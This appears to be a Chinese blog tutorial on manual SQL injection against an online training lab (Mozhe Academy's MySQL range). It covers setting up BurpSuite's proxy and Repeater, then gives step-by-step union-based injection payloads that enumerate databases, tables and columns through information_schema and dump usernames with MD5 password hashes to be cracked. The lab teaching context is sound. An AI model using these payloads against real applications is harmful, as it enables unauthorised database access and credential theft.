正文 

当前位置: 首页 > 知识 > java教程

手工注入和burpsuite入门-web安全

gaogzhen gaogzhen     2022-12-20     282

关键词:

1、手工注入

具体的手工注入步骤可以参考之前写的博文:SQL注入基础步骤及SQLMap工具使用(一)

这里我们以墨者学院->在线靶场->web安全->SQL注入->SQL手工注入漏洞测试(MySQL数据库)为例,重新复习一下,重点是:

  1. 查询注入点
  2. 注入步骤

启动靶场,图示:

分析:

  1. 登录用于输入账号密码可能出现的漏洞为弱密码口令
  2. 当鼠标放在下面灰色横条时,出现通知提示,切可点击,有可疑,点击进入

进入后,图示:

按照通常的注入步骤一步一步来:

  1. 判断是否存在注入,并寻找注入点
  2. 获取数据库相关信息,主要是获取数据库名
  3. 获取表名
  4. 获取字段名
  5. 如果密码字段为加密字段,破解密码

1.1、BurpSuite入门

因为要频繁测试,在浏览器上面修改太麻烦,我们这里借助BurpSuite完成手工注入,以后也会经常使用,这是旧版本的BurpSuite。

  1. 开启BurpSuite,切换至Proxy选项卡->Options配置子选项卡,默认一条选择,选中,点击编辑,配置好选项,图示:

  2. 浏览器配置,点开浏览器设置选项,图示:

  3. 开始捕获请求,图示:

  4. 拦截到请求之后,右键发送至repeater模块,图示:

没事安装了2021.6版本的BurpSuite,之后就以新版本测试,顺便体验下新功能;基本功能模块和
旧版暂时没有太大差别。
5. 切换到repeater模块,点击send(模拟浏览器)发送请求,获取响应,可多次重复执行,图示:

1.2、手工注入

题目提示‘PHP代码对客户端提交的参数未做任何过滤’

  1. 测试是否存在注入:参数后跟’ 测试,得到错误页面;参数后跟 and 1=1,正常页面,and 1= 2,非正常页面;

  2. order by 猜解字段个数:order by 4,返回正常;ordr by 5,返回不正常;得出结论当前表字段4

  3. union select 查看注入点:由步骤2知,字段个数为4,

    1. -1 uninon select 1,2,3,4, 得出注入点在2,3位置 ,知所有参数选择-1(或者任何不存在的id),这样才会通过union 显示union之后的结果
    2. 或者 1 union select 1,2,3,4 limit 1,1 也可以显示union之后的结果,图示

  4. 获取数据库版本及全部数据库名:-1 union select 1,version(),group_concat(schema_name),4 from information_schema.schemata,和墨者相关第二个数据库mozhe_Discuz_StormGroup,图示

  5. 获取mozhe_Discuz_StormGroup数据库下的所有表名:-1 union select 1,version(),group_concat(table_name),4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’,和题目相关就是第一个表StormGroup_member

  6. 获取表StormGroup_member下所有的字段:-1 union select 1,version(),group_concat(column_name),4 from information_schema.columns where table_name=‘StormGroup_member’,结果id,name,password,status,name,password就是我们需要的字段

  7. 查询字段name,password对应的值:-1 union select 1,name,password,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1 ,通过limit最终获取2条记录

    1. name:mozhe,password:356f589a7df439f6f744ff19bb8092c0
    2. name:mozhe,password:144c4c345dacd188921d999711ed2177

  8. 很明显密码为MD5 32位加密,去在线MD5解密网站,最终得出密码

其中BurpSuite Response响应下Render渲染选项卡(内置浏览器功能),和正常访问浏览器显示相同的页面,但是不知道为什么我这里有些卡。

网络安全工程师需要学啥?

...防御方法,熟练使用渗透测试工具的高级使用技巧,漏洞手工利用技巧,掌握对外网渗透和内网渗透技术,并掌握PHP代码审计,python安全脚本开发等技能,那么你才算是在Web安全行业小有所成了!当然了,如果你入门网络安全,... 查看详情

xxe漏洞中doctypeentity傻傻分不清-web安全基础入门—xml外部实体注入(xxe)(代码片段)

欢迎关注订阅专栏!WEB安全系列包括如下三个专栏:《WEB安全基础-服务器端漏洞》《WEB安全基础-客户端漏洞》《WEB安全高级-综合利用》知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读... 查看详情

运维安全-mysql手工注入(代码片段)

为什么要学习手工注入?工具:sqlmap万能密码,直接登录到后台页面,不需要密码:admin‘or1=1#,当后台存在注入的话,才能使用注入密码,不是所有的网站进行登录。当输入admin,admin,在后台的SQL语句是:select*fromuserwhereusername=... 查看详情

新手入门:web安全测试大盘点(代码片段)

...b服务器进行攻击。攻击的方式也非常多,常见的有SQL注入、跨站脚本攻击、跨站请求伪造、缓存区溢出等。由此,我们不得不对网络环境的安全性加以提升。软件测试工程师通过分析黑客的攻击行为等方式,对网站... 查看详情

网络安全入门:不可不知的8款免费web安全测试工具

...益凸显。黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这... 查看详情

安全测试入门——sqlmap的简易使用

目录一、了解sql注入注入原理注入举例其他注入手法二、Sqlmap使用环境搭建Sqlmap简介Sqlmap环境搭建三、Sqlmap使用样例基本使用参数详解一、了解sql注入注入原理引用文本通过把SQL命令插入到Web表单提交或输入域名或页面请求的查... 查看详情

nosqlmongodb注入——本质上还是和sql注入是类似的

墨者学院-SQL手工注入漏洞测试(MongoDB数据库)SQL手工注入漏洞测试(MongoDB数据库)背景介绍安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MongoDB,PHP代码对客户端提交的参数未做任何过滤。尽情的... 查看详情

web安全最亲密的战友burpsuite—网络攻防常用工具介绍--burpsuit工具初体验一(代码片段)

...学更快入门。为后续学习扫清障碍。文章目录前言什么是BurpSuiteBurpSu 查看详情

用burpsuite和sql联动工具注入漏洞

...部分网站注入是不可行的,这时候就需要借助sqlmap和burpsuite联动的办法来进行工具注入。这种方法是可以注入大部分网站的,十分通用,那要如何操作呢?首先,我们要用firefox部署好dvwa靶场,(python3.... 查看详情

安全性测试入门:commandinjection命令行注入攻击和防御

安全性测试入门(二):CommandInjection命令行注入攻击和防御本篇继续对于安全性测试话题,结合DVWA进行研习。CommandInjection:命令注入攻击。  1.CommandInjection命令注入命令注入是通过在应用中执行宿主操作系统的命令,来... 查看详情

springsecurity入门demo

...授权。在SpringFramework基础上,SpringSecurity充分利用了依赖注入(DI,DependencyInjection)和面向切面技术。 二、建立工程参考h 查看详情

mysql|post基于错误的注入(代码片段)

MySQL|POST基于错误的注入1.Burpsuit抓取HTTP请求Burpsuit是一款Web安全测试的利器,集成了几乎web安全测试中所有需要用到的功能。运行前提:1.需要安装Java下载连接:https://www.java.com/zh_CN/同意并且免费下载下载好之后直接运行&#... 查看详情

第一章burpsuite安装和环境配置

BurpSuite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。在渗透测试中,我们使用BurpSuite将使得测试工作变得更加容易和方便,即使在不需要娴熟的... 查看详情

攻防世界xctf-web入门全通关(代码片段)

...考察下面几点:基本的PHP、Python、JS语法基本的代理BurpSuite使用基本的HTTP请求交互过程基本的安全知识(Owasptop10)1.View_source题目描述& 查看详情

springboot入门

...模块测试提供支持的类。Spring框架的所有组件都通过依赖注入粘在一起。依赖注入(也称为控制反转)使设计和测试松散耦合的软件模块变 查看详情

安全测试工具burpsuite

安全测试工具BurpSuite一、BurpSuite的重要特征二、BurpSuite的应用场景三、BurpSuite实操一、开启代理工具二、配置代理:三、开启抓取内容四、尝试篡改请求五、进行接口漏洞注入三、总结BurpSuite是世界有名的安全渗透工具,... 查看详情

web安全_基础入门_系统及数据库,明确安全测试思路(演示只需要熟悉流程)

...两者区别及识别意义3.操作系统层面漏洞类型对应意义SQL注入漏洞跨站脚本漏洞弱口令漏洞HTTP报头追踪漏洞Struts2远程命令执行漏洞框架钓鱼漏洞(框架注入漏洞)文件上传漏洞应用程序测试脚本泄露私有IP地址泄露漏 查看详情

安全测试web安全测试常规安全漏洞可能存在sql和js注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?sql注入漏洞修复js注入漏洞修复漏洞存在场景分析和修复示例(代码片段(代码片段

文章目录前言JS注入SQL注入HTTP协议web应用接口场景实现分析1、url路由实现2、“/test”路由访问功能,最简单实现get、post响应示例3、“/test”接口分析说明4、可能存在js或sql注入场景说明5、存在js或sql注入场景分析6、存在js... 查看详情